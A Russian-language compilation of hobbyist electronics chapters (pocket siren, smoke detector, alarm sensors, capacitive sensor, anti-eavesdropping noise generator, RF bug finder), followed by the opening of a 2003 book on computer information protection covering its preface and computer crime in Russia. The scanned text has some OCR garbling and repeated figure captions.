Топология печатной платы и расположение на ней элементов (кроме предохранителя) приведены на рис. 3.18. Трансформатор крепится к плате клеем.

Питается схема от аккумулятора или любого источника с напряжением 10...15 В.

При правильном включении фаз обмоток Т1 схема начинает работать сразу. Настройка заключается в подборе конденсатора С2 — по максимуму выходного напряжения на клеммах ХЗ и Х4, а также в подборе режима работы автогенератора резистором R2 для получения минимального тока потребления

при устойчивом самовозбуждении (запуске автогенератора в момент включения питания).

Обычно потребляемый схемой ток не превышает 50 мА. Для того чтобы повысить экономичность устройства, можно его дополнить таймером (рис. 3.19), включаемым между источником питания и схемой. Таймер позволяет при подаче на схему напряжения включать "ЕЖИК" на 5...15 секунд (время зависит от величины номинала конденсатора С10 и резистора R5), после чего он ее обесточивает до момента повторного включения питания.

3-19.jpg

Рис. 3.18. Топология печатной платы и расположение элементов

3-20.jpg

Рис. 3.19. Электрическая схема таймера

В схемах применены конденсаторы С1, С7, С10 типа К53-4; С2, СЗ, С4, С8, С9 — К73-9 на 100 В ; С5, С6 — К42У-2 или К73-16В на 1600 В.

 

Рис. 3.16. Электрическая схема "ЕЖИКА"

Изображение: 

Рис. 3.17. Составные части конструкции броневой катушки

Изображение: 

Рис. 3.18. Топология печатной платы и расположение элементов

Изображение: 

Рис. 3.19. Электрическая схема таймера

Изображение: 

Ф.1 Определение энергии запасенного заряда на емкости

Изображение: 

18. Карманная сирена

КАРМАННАЯ СИРЕНА

Это устройство предназначено для тех, кто беспокоится о своей безопасности. Оно может быть полезно детям, женщинам и позволяет владельцу привлечь к себе внимание окружающих людей для оказания необходимой помощи. Схема может также применяться в составе охранной сигнализации как дополнительный звуковой сигнализатор.

3-21.jpg

Рис. 3.20. Электрическая схема сирены

Устройство легко размещается в любом кармане и при его включении создает плавно меняющийся звуковой сигнал, похожий на звук милицейской сирены. Громкости сигнала достаточно, чтобы привлечь внимание окружающих людей в радиусе более 50 метров.

Схема устройства приведена на рис. 3.20. Она состоит из двух связанных генераторов на микросхеме D1. Частота генератора на элементах D1.4, D1.6 меняется полевым транзистором VT1, которым управляет генератор (D1.1, D1.2) с более низкой рабочей частотой.

В качестве источника звука используется пьезоизлучатель ЗГИ, ЗП-22 или аналогичный. Для повышения громкости звука излучатель включен к трансформатору Т1. Его можно взять от малогабаритного радиоприемника, используя обмотку с большим числом витков в качестве вторичной, а первичную (или ее часть) подключить по схеме автотрансформатора, как это показано на рисунке.

Такое включение HF1 позволяет получать на нем переменное напряжение более 100 В, что значительно повышает громкость звука. Используется микропереключатель S1 типа ПД-9-2 или любой малогабаритный.

Топологию печатной платы можно использовать (с небольшими изменениями) от схемы имитатора голосов птиц (см. раздел 6, рис. 6.1).

Конструкция корпуса может быть любой, но единственное требование, которому он должен удовлетворять, — это механическая прочность (выдерживать удар при падении устройства).

 

Рис. 3.20. Электрическая схема сирены

Изображение: 

19. Датчик дыма для сигнализации о пожаре

ДАТЧИК ДЫМА ДЛЯ СИГНАЛИЗАЦИИ О ПОЖАРЕ

От пожара ущерб может быть еще больше, чем от воров, а вовремя поданный сигнал тревоги позволит хоть что-то спасти.

3-22.jpg

Рис. 3.21. Электрическая схема датчика дыма

На промышленных объектах в основном используются для сигнализации о пожаре тепловые датчики (они наиболее дешевы). Особенность их устройства такова, что они подают сигнал тревоги, когда охраняемое помещение уже сгорело.

Наиболее надежны, по мнению пожарных, считаются датчики, срабатывающие на дым, однако они далеко не всем по карману.

Один из вариантов выполнения датчика дыма приведен на рис. 3.21. Cхема состоит из генератора (на элементах микросхемы DD1.1, DD1.2, С1, R1, R2), формирователя коротких импульсов (на DD1.3 и С2, R3), усилителя

3-23.jpg

Рис. 3.22. Вид конструкции датчика

(VT1) и излучателя (HL1) ИК-импульсов, а также компаратора (DD2) и ключа на транзисторе (VT2). При приеме ИК-импульсов фотодиодом HL2 срабатывает компаратор и своим выходом разряжает конденсатор С4. Как только прохождение импульсов нарушится, конденсатор зарядится через резистор R9 в течение 1 секунды до напряжения питания, и начнет работать элемент D1.4. Он пропускает импульсы генератора на коммутатор тока VT2. Применение светодиода HL3 не является необходимым, но при его наличии удобно контролировать момент срабатывания датчика.

Конструкция датчика (рис. 3.22) имеет рабочую зону, при попадании в которую дыма ослабляется прохождение ИК-импульсов, а если не смогли пройти несколько импульсов подряд — срабатывает датчик (что обеспечивает помехоустойчивость схемы). При этом в соединительной линии появляются импульсы тока, которые и выделяет схема контроля, приведенная на рис. 3.23.

3-24.jpg

Рис. 3.23. Схема контроля

Датчиков дыма к одному охранному шлейфу можно подключать (параллельно) много. При настройке схемы контроля • резистором R14 устанавливаем транзисторы так, чтобы VT3 и VT4 находились в запертом состоянии (светодиод HL4 не светится).

Один датчик дыма в режиме ОХРАНА потребляет ток не более 3 мА и проверен при работе в диапазоне температур от -40 до +50 °С.

Выход схемы контроля (коллектор VT4) может подключаться к системе охраны непосредственно вместо датчика.

При использовании нескольких датчиков, одновременно установленных в разных местах, схему можно дополнить индикатором номера сработавшего датчика дыма. Для этого нужно, чтобы частоты генераторов (зависит от С1 и R2) отличались друг от друга, а воспользовавшись цифровым индикатором частоты, например предложенным М. Назаровым ("Радио", N 3, 1984, стр. 29—30), легко будет определить место возгорания. При этом отпадает необходимость вести охранные шлейфы отдельно до каждого датчика, что значительно упростит разводку проводов и снизит их расход.

Транзисторы VT1 и VT2 могут быть заменены на КТ814. ИК-диоды подойдут многих других типов, но при этом может потребоваться подбор номинала резистора R6.

Конденсаторы использованы С1, С2, С4, С5 типа К10-17а, СЗ — К53- 18-16В, С6 - К50-6-16В. Резистор R14 типа СП5-2, остальные типа С2-23.

Датчик дыма целесообразно устанавливать в помещениях, где хра нятся легко воспламеняющиеся предметы, а размещать в местах, где проходит поток воздуха, например вблизи вентиляционного отверстия, - в этом случае возгорание будет обнаружено раньше.

Схема может найти и другие применения, например в качестве безконтактного датчика для охранной сигнализации или устройств автоматики.

 

Рис. 3.21. Электрическая схема датчика дыма

Изображение: 

Рис. 3.22. Вид конструкции датчика

Изображение: 

Рис. 3.23. Схема контроля

Изображение: 

20. Датчики для охранной сигнализации

ДАТЧИКИ ДЛЯ ОХРАННОЙ СИГНАЛИЗАЦИИ

Существует много различных видов датчиков для охранной сигнализации. Большинство из них рассматривать из-за сложности изготовления в домашних условиях мы не будем, а остановимся на наиболее простых.

Так, стекло автомобиля может охранять и обычная миниатюрная кнопка (МП-1), установленная на уголок, рис. 3.24. Крепится она к стеклу зажимом уголка под резиновую уплотнительную прокладку.

Кроме кнопок, в качестве датчиков наиболее часто применяются герметичные герконовые контакты, замыкающиеся при воздействии магнита. Они обладают высокой надежностью и малыми габаритами, что делает возможным потайное размещение в углублении на каркасе дверей и оконных рам. При этом небольшой магнит крепится на подвижной части, например клеем (рис. 3.25).

В зависимости от расположения магнита относительно геркона, датчик может работать на замыкание или размыкание цепи при срабатывании (обычно используют на размыкание).

Чувствительности контактов геркона достаточно, чтобы он срабатывал на расстоянии 5...15 мм от магнита.

Использованием только герконовых датчиков и кнопок не везде удастся обеспечить надежную охрану (окно могут разбить).

Простейшим способом сигнализации при разбивании окна является наклеенная по периметру стекла тонкая и узкая полоска из металлической фольги, включенная последовательно в цепь

3-25.jpg

Рис. 3.24

3-26.jpg

Рис. 3.25

3-27.jpg

Рис. 3.26

3-28.jpg

Рис. 3.27

охранного шлейфа (см. рис. 3.26). Она порвется при разбивании стекла, но, если вор будет использовать стеклорез, может не сработать.

Для охраны на стеклах широко используют выпускаемые промышленностью датчики ДИМК (рис, 3.27). Такой датчик клеится к стеклу и срабатывает на удары или разбивание за счет того, что пластина с закрепленным на ней магнитом не имеет жесткого крепления и при ударах отходит от геркона, что разрывает цепь охранного шлейфа (все датчики подключаются последовательно).

Аналогичную конструкцию несложно изготовить самостоятельно или приобрести.

Для сигнализации об ударах и вибрациях может использоваться также пьезосигнализатор типа В-2 (BQ1, рис. 3.28) совместно со схемой усилителя.

Этот датчик рассчитан на работу в диапазоне температур ±60 °С и приклеивается к стеклу клеем или прижимается металлической пластиной к корпусу автомобиля или гаража (рис. 3.29).

Питание схемы может быть от 5 до 15 В, а чувствительность устанавливается резистором R8 при настройке. При срабатывании сигнализатора на выходе схемы появляется кратковременно нулевой уровень. Устройство можно подключить непосредственно к схеме охраны (например приведенной на рис. 3.10).

На автомобилях для предотвращения снятия колес часто применяют датчики механических колебаний корпуса. Такой датчик несложно изготовить из пружинящей металлической пластины с закреплением на одном

3-29.jpg

Рис. 3.28. Усилитель к пьезодатчику

3-30.jpg

Рис. 3.29. Вид крепления датчика

конце груза (см. рис. 3.30), но он обладает низкой надежностью и требует частой механической подстройки чувствительности из-за разбалтывания, а также изменения погодных условий.

Чувствительность такого датчика зависит от неровности поверхности земли на месте стоянки, что нередко приводит к ложным срабатываниям или неконтролируемому снижению чувствительности.

3-31.jpg

Рис. 3.31. Усилитель к электромагнитному датчику

3-32.jpg

Рис. 3.30. Датчик механических колебании

Всех этих недостатков лишена схема с электромагнитным датчиком (рис. 3.31). В качестве чувствительного к колебаниям датчика можно использовать малогабаритный миллиамперметр (например от бытовой радиоаппаратуры, М4370 и многие другие), доработав его в соответствии с рис. 3.32. Для этого корпус измерительного прибора вскрывается и на конце стрелки закрепляется небольшой грузик (можно взять кусочек трубчатого припоя с внутренней канифолью). Канифоль удаляется иголкой, а в полученное отверстие вставляется конец стрелки и обжимается плоскогубцами.

При выборе миллиамперметра неважно, где у него начальное положение стрелки, — под действием веса груза она займет среднее положение при соответствующей ориентации самого прибора.

3-33.jpg

Рис. 3.32 Конструкция электромагнитного датчика механических колебании

Чувствительность электромагнитного датчика колебаний не зависит от неровности места, и он может срабатывать даже от легкого прикосновения к машине, а его чувствительность легко изменить резистором R5 типа СП5-2В (так, во время дождя она должна быть снижена для исключения ложных срабатываний).

Для удобства эксплуатации лучше применить два резистора R5 и тумблером переключать их на заранее установленные чувствительности. Схему усилителя к дагчику лучше располагать вблизи от датчика.

Для охраны темного подвала или погреба можно использовать датчик света (рис. 3.33). Он позволит обнаружить проникновение туда постороннего, который све^орл яавэрчяка воспользуется.

3-34.jpg

Рис. 3.33. Датчик- освещения

Резисторы, отмеченные на схемах "*", требуется подбирать при регулировке.

 

Рис. 3.24 Стекло автомобиля может охранять и обычная миниатюрная кнопка (МП-1), установленная на уголок

Изображение: 

Рис. 3.25 Крепление небольшого магнита на подвижной части

Изображение: 

Рис. 3.26 Тонкая и узкая полоска из металлической фольги в охранном шлейфе

Изображение: 

Рис. 3.27 Использование датчика ДИМК

Изображение: 

Рис. 3.28. Усилитель к пьезодатчику

Изображение: 

Рис. 3.29. Вид крепления датчика

Изображение: 

Рис. 3.30. Датчик механических колебании

Изображение: 

Рис. 3.31. Усилитель к электромагнитному датчику

Изображение: 

Рис. 3.32 Конструкция электромагнитного датчика механических колебании

Изображение: 

Рис. 3.33. Датчик- освещения

Изображение: 

21. Емкостной датчик

ЕМКОСТНОЙ ДАТЧИК

Устройство реагирует на приближение руки к металлическому предмету, например замку, сейфу, или же на касание охраняемого предмета. Датчиком может служить и любая электропроводная пластина с размерами примерно 200х200 мм. Чувствительность датчика зависит от настройки и может составлять до 20 см.

Отличительной особенностью приведенных схем емкостных датчиков является их малое потребление (работа в режиме микротоков), что позволяет применять автономное питание.

В основе работы схемы (рис. 3.34) используется принцип изменяемой емкости. При поднесении руки к датчику WA1 в колебательный контур автогенератора на транзисторе VT1 вносится емкость, и его частота меняется. Начальная частота автогенератора около 280 кГц. Схема настраивается так, чтобы второй колебательный контур (L2, С7) был в резонансе с частотой автогенератора.

На транзисторе VT4 собран активный детектор ВЧ сигнала. При достаточной амплитуде напряжения в контуре (L2, С7) VT4 будет находиться в насыщении (при этом VT5 заперт).

3-35.jpg

Рис. 3.34

Цепь из резисторов R6, R7 обеспечивает устойчивую работу схемы при изменении питающего напряжения от 3,5 до 10В. Резистором R6 можно установить нужную чувствительность датчика.

Транзисторы VT2 и VT3 используются как диоды для стабилизации режимов работы транзисторов VT1 и VT4 при изменении питающего напрядения. По сравнению с диодами переход транзистора обеспечивает лучшую стабилизацию напряжения при малых рабочих токах.

Для удобства настройки схемы к коллектору VT5 можно подключить светодиод с ограничительным резистором (величина резистора зависит от напряжения питания и может быть от 200 до 1000 Ом).

3-36.jpg

Рис. 3.35

3-37.jpg

Рис. 3.36. Топология печатной платы

Грубая настройка схемы производится конденсатором С7, плавная — сердечником катушки L2, а также резистором R6. Окончательная настройка устройства проводится с реальным датчиком WA1, с которым схема будет в дальнейшем работать. При этом если охраняемый предмет имеет большую металлическую поверхность, то может потребоваться установка разделительного конденсатора небольшой емкости (5...100 пФ) между WA1 и контактом 1 схемы.

Катушки L1, L2 намотаны на ферритовом стержне типа 600НН (или 400НН) диаметром 10 мм и длиной
55 мм (см. рис. 3.35). Такие ферриты используются в качестве антенны в приемниках на СВ и ДВ диапазонах. Катушка L1 содержит 350 витков, L2 — 250 витков провода ПЭЛШО диаметром 0,08...0,12 мм, которые распределены равномерно по бумажному каркасу на ферритовом стержне. Сердечник L2 должен перемещаться относительно каркаса.

Постоянные резисторы применены типа С2-23, подстроечный R6 — СПЗ-19а, конденсатор С10 типа К53-1, остальные конденсаторы типа К10-17.

На рис. 3.36 и 3.37 приведена конструкция печатной платы и расположение на ней элементов.

Схема датчика размещается в любом пластмассовом корпусе и крепится вблизи отдатчика WA1 (100...200 мм).

Устройство может работать совместно с другими схемами охраны в качестве датчика или как самостоятельное охранное устройство при наличии звукового индикатора (рис. 3.38).

Параметры катушек L1, L2 такие же, как в схеме, приведенной на рис. 3.34, катушка L3 намотана на двух склеенных вместе ферритовых кольцах (600...2000НН) типоразмера КЮхбхЗ и содержит 250 витков того же провода (индуктивность ее около 120 мГн).

3-38.jpg

Рис. 3.37. Расположение элементов

Принцип работы звукового генератора на транзисторах VT6 и VT7 аналогичен с приведенной схемой на рис. 4.12. В качестве источника звука HF1 подойдет любой пьезоизлучатель, но топология печатной платы (рис. 3.39) дана для установки ЗГИ 8.

На плате резисторы R1 и R2 раполагаются над конденсаторами, что увеличивает плотность монтажа, а конденсатор С10 применен типа К50-16 на 16 В.

При питании схемы от источника с напряжением 6 В ток потребления в режиме ОХРАНА не превышает 1 мА, а при звуковом сигнале — 3 мА.

3-39.jpg

Рис. 3.38

3-40.jpg

Рис. 3.39

 

Рис. 3.34 Принципиальная схема емкостного датчика

Изображение: 

Рис. 3.35 Намотка катушек

Изображение: 

Рис. 3.36. Топология печатной платы

Изображение: 

Рис. 3.37. Расположение элементов

Изображение: 

Рис. 3.38 Использование устройства при наличии звукового индикатора

Изображение: 

Рис. 3.39 Топология печатной платы

Изображение: 

22. Генератор шума

ГЕНЕРАТОР ШУМА

Существуют специальные приборы, которые позволяют на расстоянии прослушивать разговоры через оконные стекла. При этом используется свойство звуковых волн создавать микровибрацию стекла, которую с помощью узконаправленных оптических приборов можно преобразовать в звук.

Предотвратить прослушивание деловых разговоров через окна позволяет генератор широкополосного акустического шума (рис. 3.40).

3-41.jpg

Рис. 3.40

Устройство собрано на трех КМОП микросхемах и состоит из задающего генератора на частоту 50 кГц (D1.1, D1.2), формирователя псевдослучайной последовательности импульсов на сдвигающих регистрах (D2, D3) и логике (D1.3, D1.4).

Звуковыми излучателями (HF1, HF2) являются используемые в некоторых телефонах капсули ВП-1 или ДЭМ-4М.

Резистор R4 позволяет регулировать громкость звука.

Схема может питаться от любого нестабилизированного источника с напряжением от 4 до 15 В и потребляет ток не более 20 мА.

В качестве источника звука подойдут и любые малогабаритные динамики (с 50-омным сопротивлением), но при этом возрастет потребляемый ток. Транзисторы можно заменить на КТ829А.

При правильной сборке схема настройки не требует.

Устройство выполняется в виде переносной коробки и размещается на подоконнике, вблизи от стекла. Включать генератор шума можно при проведении деловых переговоров, в случае необходимости.

 

Рис. 3.40 Генератор шума

Изображение: 

23. Радиочастотный искатель подслушивающих устройств

РАДИОЧАСТОТНЫЙ ИСКАТЕЛЬ ПОДСЛУШИВАЮЩИХ УСТРОЙСТВ

Сегодня каждый может приобрести или собрать самостоятельно радиомикрофон, а также телефонное радиопрослушивающее устройство. Если вы занимаетесь бизнесом, то иногда необходима уверенность в том, что ваш разговор в квартире или офисе не прослушивается. Ведь от соблюдения коммерческой тайны часто зависит успех дела.

Обычно радиоподслушивающие устройства ("жучки") излучают на одной частоте в диапазоне 30...500 МГц небольшую мощность (до 5 мВт). Инода такие устройства работают в ждущем режиме: включаются на передачу при наличии шума в помещении (что обеспечивает экономичность расходования энергии элементов питания) или же при снятии телефонной трубки. "Жучки" могут иметь постоянное питание от сети 220 В — в этом случае они располагаются внутри розеток или переходных тройников.

Услуги специалистов по поиску таких закладок стоят довольно дорого. Самостоятельно разбирать и осматривать все электроприборы — займет очень много времени и не гарантирует успех (электрическую лампочку не разберешь, а в ней может находиться радиомикрофон).

3-42.jpg

Рис. 3.41

Простейшее устройство, которое способно вам помочь в обнаружении подслушивающих устройств, приведено на рис. 3.41.

Схема является широкополосным мостовым детектором ВЧ напряжения, который перекрывает диапазон частот 1...200 МГц (при использовании в качестве VD1...VD6 диодов СВЧ диапазона рабочая полоса может быть расширена) и позволяет обнаруживать "жучки" на расстоянии примерно 0,5...1 м (это зависит от мощности передатчика).

Известно, что измерение ВЧ напряжений с уровнем меньше 0,5 В затруднено тем, что уже при 0,2...0,3 В все полупроводниковые диоды при детектировании становятся неэффективны из-за особенности их вольт-амперной характеристики.

В данной схеме применен известный способ измерения малых переменных напряжений с использованием сбалансированного диодно- резистивного моста. Небольшой ток, протекающий через диоды VD3, VD4, улучшает условия детектирования (повышает чувствительность) и позволяет отодвинуть нижнюю границу уровня измеряемых напряжений до 20 мВ при равномерной амплитудно-частотной характеристике.

Диоды VD5, VD6 образуют второе плечо моста и обеспечивают термостабилизацию схемы. На элементах микросхемы D1.2...D1.4 собраны трехуровневые компараторы, к выходам которых подключены светодиодные индикаторы HL1...HL3.

Диоды VD1, VD2 применены как стабилизаторы напряжения 1,4 В, что необходимо для устойчивой работы схемы в широком диапазоне изменения питающих напряжений.

Применение устройства требует определенных навыков, так как схема довольно чувствительна и способна улавливать вблизи любые радиоизлучения, например работу гетеродина приемника или телевизора, а также вторичное переизлучение токопроводящими поверхностями.

Для облегчения поиска "жучка" используют сменные антенные штыри с разной длиной (рис. 3.42), которые позволяют снизить чувствительность схемы.

3-43.jpg

Рис. 3.42

При использовании устройства, после его включения, необходимо резистором R2 добиться свечения индикатора HL3. Этим мы устанавливаем уровень начальной чувствительности относительно фона. При поднесении антенны к источнику радиоизлучения должны начинать светиться светодиоды HL2 и HL1 по мере увеличения амплитуды принятого сигнала.

Регулировку схемы подстроечным резистором R9 выполняют один раз (при первоначальной настройке устройства от него зависит уровень порогов чувствительности компараторов).

Питается схема от аккумулятора 7Д-0.125Д или батарейки типа "Крона" и сохраняет работоспособность при изменении питания от 6 до 10В.

В схеме применены: переменные резисторы R2 типа СПЗ-36 (многооборотный), R9 типа СПЗ-19а, остальные резисторы — типа С2-23; конденсаторы С1...С4 типа К10-17; гнездо Х1 типа Г4,0, выключатель S1 типа ПД-9-2.

Светодиоды можно заменить на любые из серии КИП (при малом потребляемом токе они светятся достаточно ярко).

Конструктивное выполнение схемы может быть любым, например в виде записной книжки (при использовании плоских аккумуляторов).

 

Рис. 3.41 Принципиальная схема анализатора подслушивающих устройств (жучков)

Изображение: 

Рис. 3.42 Антенна для поиска подслушивающих устройств (жучков)

Изображение: 

9. Криптография и защита информации

Самоучитель по защите информации

 

Автор: Борис Анин, "Защита компьютерной информации".

Издательство "BHV-СПб", 2003

Предисловие

Предисловие

Люди, уходя из дома, обычно закрывают входную дверь на замок. Они также запирают свои автомобили, оставляя их припаркованными на улице иди на стоянке. И, как правило, не сообщают номер своей кредитной карты первому встречному коробейнику, который пристает к прохожим па удине. настырно предлагая купить у него товары сомнительного качества. Однако подавляющее большинство людей до конца не осознает, насколько сильно они рискуют, если не заботятся о защите информации, находящейся в их компьютерах.

Достоверно известно, что лишь отдельные пользователи предпринимают хоть какие-то меры, призванные сберечь их данные. Остальные всерьез задумываются об этом только тогда, когда теряют информацию, хранимую в компьютере. Более того, их компьютерные системы зачастую совершенно не защищены от краж и вандализма.

Каждый раз, используя свой компьютер, его владелец добавляет туда определенную порцию информации. Именно эта совокупная информация и является наиболее ценным компонентом всей компьютерной системы. А это значит, что если не предпринять специальных мер для ее зашиты, издержки, которые понесет пользователь, попытавшись восстановить утраченные данные, значительно превысят стоимость аппаратных средств, используемых для хранения этих данных. Еще более чреватой опасными последствиями является ситуация, при которой налоговая и банковская информация пользователя или его деловая переписка попадает в чужие руки. Трудно себе вообразить, что кто-то, находясь в здравом уме и твердой памяти, по доброй воле предоставляет свою личную информацию людям, с которыми не имеет или не желает иметь никаких дел.

Но даже если вам нечего скрывать от посторонних (в это трудно поверни,. но предположим, что это действительно так), непременно отыщется кто-нибудь, кто не прочь превратить ваш компьютер в груду бесполезною хлама, как только представится такая возможность. Расплодившиеся киберпанки, крэкеры, фрикеры и брейкеры с большим энтузиазмом занимаются электронным воровством, что можно сравнить с осквернением могил и разрисовыванием стен зданий неприличными надписями.

Не следует пренебрегать и защитой данных от стихийных бедствии. Ведь совершенно не важно, испортится ваш жесткий диск от компьютерною вируса, от рук злобного хакера, или ту же самую медвежью услугу вам окажет ураган, наводнение либо шаровая молния.

Не менее важно отметить, что вне зависимости от того, насколько ценна ваша информация, российским законодательством она безусловно признается объектом вашей собственности. И вы, как владелец своей информации. имеете право определять правила ее обработки и зашиты. Базовым в этом отношении является Закон Российской Федерации "Об информации, информатизации и защите информации", принятый 25 января 1995 г. В соответствии с ним любой российский гражданин может предпринимать необходимые меры для предотвращения утечки, хищения, утраты, искажения и подделки информации. Вопрос состоит в том, какие действия являются на самом деле необходимыми для адекватной защиты вашей информации.

Рискну предположить, что вы вряд ли покидаете свой дом даже на короткое время без того, чтобы не запереть дверь, хотя это довольно .хлопотное занятие. Во-первых, необходимо обладать минимумом технических знаний, чтобы подобрать и установить надежный замок. Во-вторых, требуется постоянный контроль за состоянием замка, чтобы содержать его в исправности. В-третьих, чтобы замок предотвращал проникновение в дом посторонних людей, вы должны соблюдать определенные правила (хранить ключи в надежном месте, а также не оставлять дверь незапертой). Подобные же правила применимы и в случае защиты информации в компьютерных системах. Именно поэтому так важно отыскать разумный компромисс между ценностью ваших данных и неудобствами, связанными с использованием необходимых мер безопасности.

Как и дверной замок, любая система компьютерной защиты информации не является полностью безопасной. Всегда найдется кто-нибудь, способный взломать защитные механизмы компьютера. К счастью, такие люди встречаются очень редко, иначе единственный способ защитить наши данные состоял бы в их уничтожении.

Таким образом, задача обеспечения информационной безопасности противоречива по самой своей сути. С одной стороны, средств обеспечения безопасности никогда не бывает слишком много в том смысле, что защиту всегда можно тем или иным способом преодолеть (просто каждый раз, когда повышается уровень защиты, приходится придумывать более изощренный способ ее обхода). С другой стороны, чем сильнее кого-то или что-то защищают, тем больше возникает неудобств и ограничений, и в результате вместо чувства спокойствия информационная защита вызывает лишь раздражение и стремление от нее отмахнуться, как от надоедливой мухи. Например, за счет жесткого контроля за доступом к компьютерной системе с помощью паролей несомненно снижается вероятность их подбора взломщиком, однако одновременно это заставляет рядовых пользователей прилагать значительно больше усилий для придумывания и запоминания паролей. А установка строгих ограничений на доступ к информации создает дополнительные трудности при совместной работе с этой информацией. Поэтому идеальной и универсальной системы защиты информации не существует: здесь все слишком индивидуально, и вариант защиты, наиболее близкий к Оптимальному, все время приходится подбирать заново.

Внимательно изучив предлагаемую вашему вниманию книгу, вы сможете подобрать оптимальные методы для защиты компьютерной информации. При этом очень существенную роль будет играть степень изолированности вашего компьютера от внешнего мира.

Если компьютер находится у вас дома или в офисе и физически не связан с другими компьютерами (с помощью модема или аппаратной сети), то, по всей вероятности, самая большая опасность состоит в том, что кто-то занесет в него вирус или троянскую программу. Вторая, крайне неблагоприятная перспектива, заключается в том, что ваш компьютер может быть похищен. Остальных неприятностей можно избежать, применяя парольную защиту компьютера и шифруя файлы, содержащие конфиденциальную информацию. В этом случае снабдить свой компьютер довольно надежной защитой сможет любой человек, даже не очень сведущий в вопросах информационной безопасности.

Если компьютерная система подключена к сети, то потребуется принять дополнительные меры безопасности, квалифицированно установить и правильно использовать которые под силу только подготовленному специалисту, имеющему опыт работы в области зашиты информации. Зашитые механизмы, встроенные в сетевые операционные системы, всевозможные брандмауэры и анализаторы безопасности сетей требуют очень гонкой па-стройки. Поэтому даже незначительная ошибка при их установке и настройке чревата серьезными последствиями, поскольку злоумышленнику достаточно обнаружить всего лишь одно слабое место в системе защиты, чтобы осуществить ее взлом. Однако и в случае, если компьютер работает и составе сети, изучение предлагаемой книги будет полезно всем — от технаря до менеджера, не имеющего глубоких познаний в этих вопросах. Ведь правильное использование средств зашиты информации возможно лишь в том случае, когда все люди, так или иначе причастные к работе со среда вами обработки и хранения данных, осознают (пусть даже в самых общих чертах) принципы обеспечения надежного функционирования этих средств и скрупулезно следуют данным принципам на практике.

Глава 1. Угрозы компьютерной безопасности

Глава 1. Угрозы компьютерной безопасности

1. Компьютерная преступность в России

 

Компьютерная преступность в России

В странах, где высок уровень компьютеризации, проблема борьбы с компьютерной преступностью уже довольно давно стала одной из первостепенных. И это не удивительно. Например, в США ущерб от компьютерных преступлений составляет ежегодно около 5 млрд долларов, во Франции эти потери доходят до 1 млрд франков в год, а в Германии при помощи компьютеров преступники каждый год ухитряются похищать около 4 млрд марок. И число подобных преступлений увеличивается ежегодно на 30— 4()°с.

Поскольку Россия никогда не входила (и в ближайшем будущем вряд ли войдет) в число государств с высоким уровнем компьютеризации (на большей части ее территории отсутствуют разветвленные компьютерные сети и далеко не везде методы компьютерной обработки информации пришли па смену традиционным), то довольно долго российское законодательство демонстрировало чрезмерно терпимое отношение к компьютерным преступлениям. Положительные сдвиги произошли только после ряда уголовных дел, самым громким из которых стало дело одного из программистов Волжского автомобильного завода, умышленно внесшего деструктивные изменения в программу, которая управляла технологическим процессом. что нанесло заводу значительный материальный ущерб. Отечественное законодательство претерпело существенные изменения, в результате которых был выработан ряд законов, устанавливающих нормы использования компьютеров в России.

Главной вехой в цепочке этих изменений стало введение в действие 1 января 1997г. нового Уголовного кодекса. В нем содержится глава "Преступления в сфере компьютерной информации", где перечислены следующие преступления:

  • неправомерный доступ к компьютерной информации (статья 272):
  • создание, использование и распространение вредоносных компьютерных программ (статья 273);
  • нарушение правил эксплуатации компьютеров, компьютерных систем и сетей (статья 274).

Отметим, что уголовная ответственность за перечисленное наступает только в том случае, когда уничтожена, блокирована, модифицирована пли скопирована информация, хранящаяся в электронном виде. Таким образом, простое несанкционированное проникновение в чужую информационную систему без каких-либо неблагоприятных последствии наказанию не подлежи i. Сравните: вторжение в квартиру, дом или офис против воли их владельца однозначно квалифицируется как уголовно наказуемое действие вне зависимости от последствий.

Следует сказать, что наличие законодательства, регламентирующего ответственность за компьютерные преступления, само по себе не является показателем степени серьезности отношения общества к таким преступлениям. К примеру, в Англии полное отсутствие специальных законов, карающих именно за компьютерные преступления, на протяжении многих лет отнюдь не мешает английской полиции эффективно расследовать дела такого рода. И действительно, все эти злоупотребления можно успешно квалифицировать по действующему законодательству, исходя из конечного результата преступной деятельности (хищение, вымогательство, мошенничество или хулиганство). Ответственность за них предусмотрена уголовным и гражданским кодексами. Ведь убийство и есть убийство, вне зависимости от того. что именно послужило орудием для него.

По данным Главного информационного центра МВД России в 1997 г. доля компьютерных преступлений составила 0,02% от общего числа преступлений в области кредитно-финансовой сферы. В абсолютных цифрах общее количество компьютерных преступлений в этом году превысило сотню, а суммарный размер ущерба —20 млрд рублей.

Однако к этой статистике следует относиться осторожно. Дело в том, что долгое время в правоохранительных органах не было полной ясности относительно параметров и критериев, по которым следовало фиксировать совершенные компьютерные преступления, а также попытки их совершить. Можно предположить, что данные, учтенные официальной статистикой. составляют лишь вершину айсберга, подводная часть которого представляет существенную угрозу обществу. И для этого имеются серьезные основания.

Российским правоохранительным органам становятся известны не более 5— 10% совершенных компьютерных преступлений. Их раскрываемость тоже не превышает 1—5%. Это связано с тем, что хищение информации долгое время может оставаться незамеченным, поскольку зачастую данные просто копируются. Жертвы компьютерной преступности (большинство среди них — частные предприятия) проявляют нежелание контактировать с правоохранительными органами, опасаясь распространения среди вкладчиков и акционеров сведений о собственной халатности и ненадежной работе своей фирмы, что может инициировать отток финансов и последующее банкротство.

Тенденции

По свидетельству экспертов самым привлекательным сектором российской экономики для преступников является кредитно-финансовая система. Анализ преступных деяний, совершенных в этой сфере с использованием компьютерных технологий, а также неоднократные опросы представителей банковских учреждений позволяют выделить следующие наиболее типичные способы совершения преступлений:

  • Наиболее распространенными являются компьютерные преступления. совершаемые путем несанкционированного доступа к банковским базам данных посредством телекоммуникационных сетей. В 1998 г. российскими правоохранительными органами были выявлены 15 подобных преступлений, в ходе расследования которых установлены факты незаконного перевода 6,3 млрд рублей.
  • За последнее время не отмечено ни одно компьютерное преступление. которое было совершено одним человеком. Более того, известны случаи. когда преступными группировками нанимались бригады из десятков хакеров, которым предоставлялось отдельное охраняемое помещение, оборудованное по последнему слову техники, для того чтобы они осуществляли хищение крупных денежных средств путем нелегального проникновения в компьютерные сети крупных коммерческих банкой.
  • Большинство компьютерных преступлений в банковской сфере совершается при непосредственном участии самих служащих коммерческих банков. Результаты исследований, проведенных с привлечением банковского персонала, показывают, что доля таких преступлений приближается к 70% от общего количества преступлений в банковской сфере. Например. в 1998 г. работники правоохранительных органов предотвратили хищение на сумму в 2 млрд рублей из филиала одного крупного коммерческою банка. Преступники оформили проводку фиктивного платежа с помощью удаленного доступа к банковскому компьютеру через модем, введя пароль и идентификационные данные, которые им передали сообщники, работающие в этом филиале банка. Затем похищенные деньги были переведены в соседний банк, где преступники попытались снять их со счета с помощью поддельного платежного поручения.
